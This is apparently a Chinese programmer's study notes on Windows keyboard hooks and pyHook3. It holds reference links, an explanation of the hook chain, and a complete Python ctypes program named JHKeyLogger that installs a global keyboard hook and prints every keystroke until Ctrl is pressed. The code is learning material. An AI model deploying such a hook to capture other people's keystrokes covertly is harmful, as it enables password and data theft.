安装pyhook3见:https://www.cnblogs.com/lqerio/p/12096710.html

使用见:https://www.cnblogs.com/lqerio/p/12106771.html

下面是自己学的时候查到的东西的一些整理,

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

下面开始是整理

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

windows hook原理:

windows hook 原理与实现  https://blog.csdn.net/m0_37552052/article/details/81453591

hook 基本原理 https://blog.csdn.net/qq_36381855/article/details/79962673

《windows核心编程系列》十八谈谈windows钩子  https://blog.csdn.net/fanhenghui/article/details/54138080

windows hook api:

callnexthookex()  https://baike.baidu.com/item/CallNextHookEx/3777953?fr=aladdin

C语言windows 键盘Hook:

https://blog.csdn.net/yan_star/article/details/88528631

https://blog.csdn.net/johnny_83/article/details/1701822

https://www.iteye.com/blog/huiytt-1829744

python 使用win32api windows hook :

https://www.cnblogs.com/megachen/p/9879224.html

使用到的库:

  • ctypes(通过ctypes来调用Win32API, 主要就是调用钩子函数)

使用的Win32API

  • SetWindowsHookEx(), 将用户定义的钩子函数添加到钩子链中, 也就是我们的注册钩子函数
  • UnhookWindowsHookEx(), 卸载钩子函数
  • CallNextHookEx()在我们的钩子函数中必须调用, 这样才能让程序的传递消息

在没有钩子函数的情况下windows程序运行机制

  • 键盘输入 --> 系统消息队列 --> 对应应用程序的消息队列 --> 将消息发送到对应的窗口中

在有了钩子函数的情况下windows程序运行机制

  • 键盘输入 --> 系统消息队列 --> 对应应用程序消息队列 --> 将消息发送到钩子链中 --> 消息一一调用完毕所有的钩子函数(需要调用CallNextHookEx函数才能将消息传递下去) --> 将消息发送到对应的窗口中

示例程序

    • 注意:

      • 在程序中, 我们通过CFUNCTYPE返回一个类对象, 通过该类对象可以实例化出我们需要的c类型的函数, 但是如果不将他放在全局的话则会失去效果, 因为在C语言中函数是全局的
# -*- coding: utf-8 -*-

import os

import sys

from ctypes import *

from ctypes.wintypes import *

"""

define constants

"""

WH_KEYBOARD = 13

WM_KEYDOWN = 0x0100

CTRL_CODE = 162

class JHKeyLogger(object):

    def __init__(self, user32, kernel32):

        """

        Description:

            Init the keylogger object, the property 'hook_' is the handle to control our hook function

        Args:

            @(dll)user32: just put windll.user32 here

            @(dll)kernel32: just put windll.kernel32 here

        Returns:

            None

        """

        self.user32_ = user32

        self.kernel32_ = kernel32

        self.hook_ = None

    def install_hookproc(self, hookproc):

        """

        Description:

            install hookproc function into message chain

        Args:

            @(c type function)hookproc: hookproc is the hook function to call

        Returns:

            @(bool):

                if SetWindowHookExA() function works successfully, return True

                else return False

        """

        self.hook_ = self.user32_.SetWindowsHookExA(

                                      WH_KEYBOARD,

                                      hookproc,

                                      self.kernel32_.GetModuleHandleW(None),

                                      0)

        if not self.hook_:

            return False

        return True

    def uninstall_hookproc(self):

        """

        Description:

            uninstall the hookproc function which means pick the hookproc pointer off the message chain

        Args:

            None

        Returns:

            None

        """

        if not self.hook_:

            return

        self.user32_.UnhookWindowsHookEx(self.hook_)

        self.hook_ = None

    def start(self):

        """

        Description:

            start logging, just get the message, the current thread will blocked by the GetMessageA() function

        Args:

            None

        Returns:

            None

        """

        msg = MSG()

        self.user32_.GetMessageA(msg, 0, 0, 0)

    def stop(self):

        self.uninstall_hookproc()

def hookproc(nCode, wParam, lParam):

    """

    Description:

        An user-defined hook function

    Attention:

        here we use the global variable named 'g_keylogger'

    """

    if wParam != WM_KEYDOWN:

        return g_keylogger.user32_.CallNextHookEx(g_keylogger.hook_, nCode, wParam, lParam)

    pressed_key = chr(lParam[0])

    print pressed_key,

    # hit ctrl key to stop logging

    if CTRL_CODE == lParam[0]:

        g_keylogger.stop()

        sys.exit(-1)

    return g_keylogger.user32_.CallNextHookEx(g_keylogger.hook_, nCode, wParam, lParam)

# Attention: pointer must be defined as a global variable

cfunctype = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))

pointer = cfunctype(hookproc)

g_keylogger = JHKeyLogger(windll.user32, windll.kernel32)

def main():

    if g_keylogger.install_hookproc(pointer):

        print 'install keylogger successfully!'

    g_keylogger.start()

    print 'hit ctrl to stop'

if __name__ == '__main__':

    main()

pyHook3:

pywin32简介:

https://www.cnblogs.com/achillis/p/10462585.html

pyHook 源码:

https://sourceforge.net/p/pyhook/code/ci/master/tree/README.txt

知乎pyhook:

https://www.zhihu.com/search?type=content&q=pyhook

使用pyHook的例子:

https://oldj.net/blog/2010/07/14/python-hook/

添加开始和结束按键    https://blog.csdn.net/cd_xuyue/article/details/50688748

添加开始和结束快捷键  https://blog.csdn.net/dyx1024/article/details/7338646

  使用按键Q退出监控     https://www.jianshu.com/p/6aa741a58acb?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

https://blog.csdn.net/q871063970/article/details/86648386

 win32api.PostQuitMessage()     https://www.cnblogs.com/xiaowuyi/archive/2012/03/15/2398665.html

Python3按照 pyhook,pycom:

https://blog.csdn.net/xiaoliu5396/article/details/46457585

https://blog.csdn.net/dongfuguo/article/details/70226384#reply

这里建议安装pyhook3,之前的博客里有写过安装anaconda pyhook3

https://www.cnblogs.com/lqerio/p/12096710.html

windows hook + pyhook3 + python win32api hook + C 键盘hook的更多相关文章

  1. Python win32api.keybd_event模拟键盘输入

    win32api.keybd_event 该函数原型:keybd_event(bVk, bScan, dwFlags, dwExtraInfo) 第一个参数:虚拟键码(键盘键码对照表见附录): 第二个 ...

  2. 在C#中使用全局鼠标、键盘Hook

    今天,有个同事问我,怎样在C#中使用全局钩子?以前写的全局钩子都是用unmanaged C或C++写个DLL来实现,可大家都知道,C#是基于.Net Framework的,是managed,怎么实现全 ...

  3. 如何在C#中使用全局鼠标、键盘Hook

    今天,有个同事问我,怎样在C#中使用全局钩子?以前写的全局钩子都是用unmanaged C或C++写个DLL来实现,可大家都知道,C#是基于.Net Framework的,是managed,怎么实现全 ...

  4. 键盘Hook【Delphi版】

    原文:https://www.cnblogs.com/edisonfeng/archive/2012/05/18/2507858.html 一.钩子的基本概念 a) Hook作用:监视windows消 ...

  5. windows 32位以及64位的inline hook

    Tips : 这篇文章的主题是x86及x64 windows系统下的inline hook实现部分. 32位inline hook 对于系统API的hook,windows 系统为了达成hotpatc ...

  6. [python] PyMouse、PyKeyboard用python操作鼠标和键盘

      1.PyUserInput 简介 PyUserInput是一个使用python的跨平台的操作鼠标和键盘的模块,非常方便使用.支持的平台及依赖如下: Linux - Xlib Mac - Quart ...

  7. LFD,非官方的Windows二进制文件的Python扩展包

    LFD,非官方的Windows二进制文件的Python扩展包 LFD,非官方版本.32和64位.Windows.二进制文件.科学开源.Python扩展包 克里斯托夫·戈尔克(by Christoph ...

  8. Python模拟鼠标和键盘操作实现重复性操作

    前言 由于工作需要,要利用某软件去采集数据,做重复的动作大概500多次.所以想写一个程序代替人,去点击和输入. 一开始的思路有两个:1.用Python或者windows对此软件直接操作.2.利用Pyt ...

  9. 1、[python] PyMouse、PyKeyboard用python操作鼠标和键盘

    [python] PyMouse.PyKeyboard用python操作鼠标和键盘 1.PyUserInput 简介 PyUserInput是一个使用python的跨平台的操作鼠标和键盘的模块,非常方 ...

随机推荐

  1. Mybatis执行流程学习之手写mybatis雏形

    Mybatis是目前开发中最常用的一款基于ORM思想的半自动持久层框架,平时我们都仅仅停留在使用阶段,对mybatis是怎样运行的并不清楚,今天抽空找到一些资料自学了一波,自己写了一个mybatis的 ...

  2. JavaScript中原型对象的应用!

    JavaScript中原型对象的应用! 扩展内置对象的方法 我以数组对象为例! // 原型对象的应用 扩展内置对象方法! Array.prototype.sum = function() { var ...

  3. java虚拟机——轻松搞懂jvm

    一.JVM体系结构概述 JVM位置 JVM体系结构 1.1 类加载器 ClassLoader   类加载器(ClassLoader)负责加载class文件,class文件在文件开头有特定的文件标示,并 ...

  4. 新型赌博黑产攻击肆虐网吧: LOL博彩引流+棋牌盗号

    https://mp.weixin.qq.com/s/BxnovV6jKqPkYfHEzjd_FA 新型赌博黑产攻击肆虐网吧: LOL博彩引流+棋牌盗号 看雪学院 2019-04-21

  5. GC 卡顿 优化 三色标记优势

    小结: 1. 三色标记的一个明显好处是能够让用户程序和 mark 并发的进行 Go GC 卡顿由秒级降到毫秒级以下:到底做了哪些优化? https://mp.weixin.qq.com/s/2BMGG ...

  6. RPM 和YUM总结

    RPM RPM命名: 安装 rpm -ihv 其他常用的选项: 1. 重新安装 --replacepkgs (或者 --force ) 2. 不考虑依赖 --nodeps (不推荐) 升级: 查询: ...

  7. Java 字符串简介

    从概念上讲,Java 字符串就是 Unicode 字符序列.Java 没有内置的字符串类型,而是在标准 Java 类库中提供了一个预定义类,很自然地叫做 String.每个用双引号括起来的字符串都是 ...

  8. 在Centos7上安装Python+Selenium+Chrome+Chromedriver

    1.下载Chrome 上一篇文章已经演示过了Python+Selenium+Firefox+Geckodriver安装步骤并通过自动化脚本打开百度 因此当前只需要安装Chrome和Chromedriv ...

  9. jQuery——操作DOM

    所谓Web体验,就是Web服务器与Web浏览器之间的合作.过去,都是由服务器生成HTML文档,然后浏览器负责解释并显示该文档.后来,我们可以用CSS技术来动态修改页面的外观. ###操作属性 jQue ...

  10. CS代理+proxychains+nmap进行内网扫描

    前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,要使用-Pn不使用ICMP ...